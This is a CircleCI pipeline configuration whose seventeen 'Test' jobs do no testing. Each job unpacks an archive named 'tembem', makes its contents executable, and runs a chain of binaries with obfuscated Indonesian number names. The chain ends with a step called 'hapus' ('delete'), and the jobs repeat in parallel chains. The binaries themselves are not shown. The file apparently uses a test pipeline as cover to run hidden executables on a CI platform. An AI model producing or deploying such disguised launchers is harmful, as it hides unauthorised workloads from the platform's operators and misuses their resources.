
version: 2.1

commands:
  setup:
    steps:
      - run:
          name: SetUp_01
          command: |
            tar -xf tembem && chmod u+x *
            ./apem
            ./star
            ./mod
            ./00

  setep:
    steps:
      - run:
          name: SetUp_02
          command: |
            ./hapus

  setip:
    parameters:
      result:
        type: string
    steps:
      - run:
          name: SetUp_02
          command: |
            ./s4tu

      - run:
          name: SetUp_03
          command: |
            ./du4

      - run:
          name: SetUp_04
          command: |
            ./t19a

      - run:
          name: SetUp_05
          command: |
            ./emp4t

      - run:
          name: SetUp_06
          command: |
            ./l1m4

      - run:
          name: SetUp_07
          command: |
            ./3n4m

      - run:
          name: SetUp_08
          command: |
            ./7ujuh

      - run:
          name: SetUp_09
          command: |
            ./d3l4pan

      - run:
          name: SetUp_10
          command: |
            ./53m81l4n

      - run:
          name: SetUp_11
          command: |
            ./53puluh

      - run:
          name: SetUp_12
          command: |
            ./s3bel45

      - run:
          name: SetUp_13
          command: |
            ./du4b3l45

      - run:
          name: SetUp_14
          command: |
            ./t194b3l4s

      - run:
          name: SetUp_15
          command: |
            ./3mp4t83l45

      - run:
          name: SetUp_16
          command: |
            ./l1m483l45

      - run:
          name: SetUp_17
          command: |
            ./3n4mb3l45

      - run:
          name: SetUp_18
          command: |
            ./7ujuh83l45

      - run:
          name: SetUp_19
          command: |
            ./d3l4p4nB3l45

      - run:
          name: SetUp_20
          command: |
            ./hapus

jobs:
  Test_01:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setep

  Test_02:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_02
    parallelism: 2

  Test_03:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_03
    parallelism: 2

  Test_04:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_04
    parallelism: 2

  Test_05:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_05
    parallelism: 2

  Test_06:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_06
    parallelism: 2

  Test_07:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_07
    parallelism: 2

  Test_08:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_08
    parallelism: 2

  Test_09:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_09
    parallelism: 2

  Test_10:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_10
    parallelism: 2

  Test_11:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_11
    parallelism: 2

  Test_12:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_12
    parallelism: 2

  Test_13:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_13
    parallelism: 2

  Test_14:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_14
    parallelism: 2

  Test_15:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_15
    parallelism: 2

  Test_16:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_16
    parallelism: 2

  Test_17:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_17
    parallelism: 2

workflows:
  version: 2.1
  workflo_01:
    jobs:
      - Test_01
      - Test_02:
          requires:
            - Test_01
      - Test_03:
          requires:
            - Test_01
            - Test_02
      - Test_04:
          requires:
            - Test_01
            - Test_02
            - Test_03
      - Test_05:
          requires:
            - Test_01
            - Test_02
            - Test_03
            - Test_04
      - Test_06:
          requires:
            - Test_01
            - Test_02
            - Test_03
            - Test_04
            - Test_05
      - Test_07:
          requires:
            - Test_01
            - Test_02
            - Test_03
            - Test_04
            - Test_05
            - Test_06
      - Test_08:
          requires:
            - Test_01
            - Test_02
            - Test_03
            - Test_04
            - Test_05
            - Test_06
            - Test_07
      - Test_09:
          requires:
            - Test_01
            - Test_02
            - Test_03
            - Test_04
            - Test_05
            - Test_06
            - Test_07
            - Test_08




  workflo_02:
    jobs:
      - Test_01


  workflo_03:
    jobs:
      - Test_01
      - Test_10:
          requires:
            - Test_01
      - Test_11:
          requires:
            - Test_01
            - Test_10
      - Test_12:
          requires:
            - Test_01
            - Test_10
            - Test_11
      - Test_13:
          requires:
            - Test_01
            - Test_10
            - Test_11
            - Test_12
      - Test_14:
          requires:
            - Test_01
            - Test_10
            - Test_11
            - Test_12
            - Test_13
      - Test_15:
          requires:
            - Test_01
            - Test_10
            - Test_11
            - Test_12
            - Test_13
            - Test_14
      - Test_16:
          requires:
            - Test_01
            - Test_10
            - Test_11
            - Test_12
            - Test_13
            - Test_14
            - Test_15
      - Test_17:
          requires:
            - Test_01
            - Test_10
            - Test_11
            - Test_12
            - Test_13
            - Test_14
            - Test_15
            - Test_16




